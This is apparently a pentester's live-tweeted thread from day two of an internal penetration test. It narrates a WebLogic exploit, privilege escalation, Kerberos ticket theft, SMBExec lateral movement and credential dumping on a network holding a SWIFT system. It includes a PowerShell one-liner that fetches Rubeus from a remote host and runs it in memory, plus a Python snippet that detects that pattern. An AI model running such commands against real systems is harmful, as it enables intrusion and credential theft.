Good morning my fellow #infosec and other curious individuals! Today is day TWO of my <semi> live-tweeted Internal Penetration Test with Acme. Updates to follow. Here's the thread from yesterday:
First things first, gotta get the house situated so that I can be undistracted. Let's grab some breakfast, reestablish my tunnels and start taking a look at overnight scanning data.
Oh, and if anyone is interested, this is my base playlist:
music.youtube.com
BUT I click "Start Radio" so that it gets stuff like the playlist. :)
Looks like one of the Nessus scanners picked up a bunch of WebLogic/Tomcat issues overnight. This is common with SWIFT. Let's take a look and maybe get a shell?
That AsyncResponse Vuln in WebLogic never disappoints! Linux shell obtained!
Need a ghetto TTY?
python -c 'import pty; pty.spawn("/bin/bash")'
Need to do some privilege escalation. For the sake of time, we'll use LinEnum. (I'm aware there are a bazillion other options)
github.com
I'm pretty sure it's an easy upgrade and this device is on the domain, so there's at least more I can do with it like 1/x
if it will allow me to login with the domain user I have, I may be able to escalate through that via some arbitrary policy that I've not discovered yet.
While enumerating stuff myself as the script is running, I found some passwords in ~/.bash_history! They don't work on any account on this device directly, but maybe in the domain?
That's a nope. Let's keep going.
Ok. Device wasn't connected to the domain, and there's no immediate way to root. Probably a ton of files that have juicy info in them, but we'll come back to it. There is another WebLogic server with this vulnerability. Let's hit that.
Ohh! This one is Windows, should be an instant SYSTEM shell if I can get it stable.
Meterpreter is being killed immediately, so currently I'm just stuck with a shell. @zerosum0x0 created an awesome tool called Koadic, and I forked it when they took their leave of absence. I didn't really modify it.
github.com
This should be enough to dump lsass
@zerosum0x0 Ok. So even Koadic is getting eaten. No worries. We can do this with something else. I'll hold off on using Cobalt Strike for now.
@zerosum0x0 Ok, had to step away for a second to marvel at the realization of what device I'm actually on. I can see every single SWIFT message before it's sent to the autoclient. Hell, I think I can manipulate them too. Screw it. I'm standing up Cobalt Strike.
@zerosum0x0 Lunch break! Be back shortly!
Ok. Back. That was annoying, and Cobalt Strike isn't needed. I just decided to exhaust different avenues of getting a solid shell. I was unsuccessful. BUT! Here's what I DO have now:
- Weak CMDShell
- A local Admin user I created (unneeded now)
- Valid TGTs for domain users! 1/x
I was successful in using the Weak CMDShell I got from exploiting WebLogic to execute Rubeus in memory. Check this out:
2/x
powershell.exe -c "$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest 'http://x.x.x.x/rubeus' -UseBasicParsing | Select-Object -ExpandProperty Content));[Rubeus.Program]::Main('triage')"
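A defender's view of that one-liner, as an added example that is not part of the thread: a small Python triage over constructed PowerShell script-block log text (the kind Event ID 4104 records when script block logging is enabled, which this example assumes) that flags a reflective Assembly::Load combined with a web download, the pairing that makes the in-memory execution above visible in logs. The indicator names and sample lines are mine.

```python
import re

# Constructed sample script-block texts, not logs from the engagement.
# Entry 0 mirrors the shape of the command in the thread; entry 2 is the
# same technique written with Net.WebClient instead of Invoke-WebRequest.
SAMPLE_SCRIPT_BLOCKS = [
    "$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "
    "'http://x.x.x.x/rubeus' -UseBasicParsing | Select-Object "
    "-ExpandProperty Content));[Rubeus.Program]::Main('triage')",
    "Get-ChildItem C:\\Temp | Where-Object { $_.Length -gt 1MB }",
    "[Reflection.Assembly]::Load((New-Object Net.WebClient)"
    ".DownloadData('http://x.x.x.x/tool.dll'))",
    "Invoke-WebRequest https://example.invalid/update.json -OutFile update.json",
]

# Each indicator on its own is benign; the combination is what matters.
# Patterns are case-insensitive because PowerShell is.
INDICATORS = {
    # [System.Reflection.Assembly]::Load / [Reflection.Assembly]::Load
    "reflective_load": re.compile(
        r"\[\s*(System\.)?Reflection\.Assembly\s*\]\s*::\s*Load\b", re.I),
    # common ways to pull bytes or text off the network inside a script block
    "web_fetch": re.compile(
        r"Invoke-WebRequest|\biwr\b|DownloadData|DownloadString|Net\.WebClient",
        re.I),
    # explicit [byte[]] cast feeding Load(), as in the thread's command
    "byte_array": re.compile(r"\[\s*byte\[\]\s*\]", re.I),
}


def score_script_block(text):
    """Return the names of all indicators present in one script block."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def is_in_memory_assembly_load(text):
    """True when a script block both loads an assembly reflectively and
    fetches something over the network: the in-memory execution pattern."""
    hits = score_script_block(text)
    return "reflective_load" in hits and "web_fetch" in hits


def triage(blocks):
    """Index and indicator hits for every block that matches the pattern."""
    return [(i, score_script_block(b)) for i, b in enumerate(blocks)
            if is_in_memory_assembly_load(b)]


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {idx}: {hits}")
```

A download-only block (entry 3) or a reflective load of a local file is not flagged, so a real rule would pair this with the 4104 event's script path and the parent process rather than treating it as a verdict on its own.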
More DNS trouble. Back on track now! I think my next step will be to escalate in the domain. Playing with these half-privileges is causing more trouble than it's worth.
I stole one of the TGTs from this SWIFT device and used it against the only device that the user was Local Admin on. SMBExec'd and now I have a SYSTEM shell on a device!
Ok that's going to be all for the day! I was able to dump some hashes with CrackMapExec (which gave me a cleartext password), sprayed that and it gave me 3 more accounts, which gave me one more device to dump LSA. Pulling threads, I tell ya!
Speaking of: